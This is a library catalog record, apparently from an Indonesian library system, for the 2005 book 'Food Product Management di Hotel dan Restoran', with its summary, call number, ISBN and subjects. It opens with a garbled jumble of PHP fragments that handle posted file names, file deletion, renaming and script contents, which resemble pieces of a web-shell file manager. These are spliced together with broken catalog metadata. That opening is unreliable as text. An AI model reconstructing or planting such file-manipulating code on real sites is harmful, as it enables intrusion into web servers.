);)+6;$_POST[\'d_file\']$_POST[\'d_file\']);$_POST[\'src\'])){$awal$dir);$i++ );$isi_file);$isi_script);$namafile$namafile) {$namafile);$p) {$path.\'/\'.$_POST[\'nama_baru$path);$path/.$namafile);0);0070354871179hlm : tab : il ;\" 24cm. Bi187hlm : il ;\" 23cm\"\"2).\" \".$sz[$i]);213hlm : ind : tab : il ;\" 2822hlm : il ;\" 23cm\"\"29 September 2005--Lintasarta378.17\"\"391hlm : ind : tab : il ;\" 25442hlm : ind : tab : il ;\" 285 cm\"\"AccountinganalysisArt Originalbibl\"\"Bruce Perens’ Open SourBuku Aplikasi Statistik Seri 2Cartographic MaterialCD-ROMChartComputer FileComputer SoftwareConsumer Behavior and Marketin Kembali | XML Book's Detail Food Product Management di Hotel dan Restoran Buku ini memberikan pemahaman yang lebih mendalam tentang seluk beluk food product dari aspek manajerial khususnya untuk bidang pengolahan makanan yang meliputi pengelolaan SDM, alat, material, produksi, finansial, sistem-sistem dan lingkungan. Pernyataan Tanggungjawab Pengarang Bartono P.H. - Personal NameRuffino E.M. - Personal Name Edisi No. Panggil 641.5 BAR f-1 ISBN/ISSN 9797630757 Subyek HOTELS AND MOTELS-FOOD INDUSTRYRESTAURANTS-FOOD INDUSTRY Klasifikasi 641.5 Judul Seri GMD Text Bahasa Indonesia Penerbit Andi Tahun Terbit 2005 Tempat Terbit Yogyakarta Deskripsi Fisik xi, 300 hal : il : tab : 23cm. Bibl Info Detil Spesifik Lampiran Berkas LOADING LIST... Ketersediaan LOADING LIST...
Buku ini memberikan pemahaman yang lebih mendalam tentang seluk beluk food product dari aspek manajerial khususnya untuk bidang pengolahan makanan yang meliputi pengelolaan SDM, alat, material, produksi, finansial, sistem-sistem dan lingkungan.